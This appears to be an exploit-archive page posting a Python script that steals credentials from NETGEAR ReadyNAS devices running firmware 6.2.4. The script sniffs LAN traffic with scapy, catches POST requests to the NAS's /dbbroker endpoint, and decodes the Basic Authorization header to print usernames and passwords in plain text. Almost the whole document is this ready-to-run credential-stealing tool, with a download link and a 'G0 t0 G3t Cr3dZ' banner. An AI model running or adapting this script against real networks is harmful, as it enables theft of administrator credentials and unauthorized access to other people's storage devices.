NETGEAR ReadyNAS Steal Credz

Download | Vote Up (0) | Vote Down (0)
#!/usr/bin/env python
#
# Exploit Title: NETGEAR ReadyNAS LAN /dbbroker Credential Stealing
# Date: 25/07/2015
# Exploit Author: St0rn <fabien[at]anbu-pentest[dot]com>
# Vendor Homepage: www.netgear.fr/business/products/storage/readynas
# Software Link: apps.readynas.com/pages/?page_id=143
# Version: Firmware 6.2.4
#

### Import ###
from scapy.all import *
from sys import argv,exit
from os import system

### Clear Function ###
def clear():
 system("/usr/bin/clear")


### Function to get and decode credential ###
def getReadyNASCredz(p):
 if p.haslayer(TCP) and p[IP].dst==argv[2]:
  if p.haslayer(Raw):
   if "POST /dbbroker" in p[Raw].load:
    tmp=p[Raw].load
    credz=tmp.split("\r\n")
    for i in credz:
     if "Authorization: Basic" in i:
      print "-----------------".center(80)
      print i.split(" ")[2].decode("base64").center(80)


### Main ###
if __name__ == '__main__':

 clear()
 if len(argv)<3:
  print "Usage: %s [device] [NAS_IP]" %(argv[0])
  exit(0)
 else:
  print "\n"
  print "#################".center(80)
  print "#G0 t0 G3t Cr3dZ#".center(80)
  print "#################\n".center(80)

  sniff(prn=getReadyNASCredz,iface=argv[1])

St0rn


Be the first to give feedback !

Please login to comment !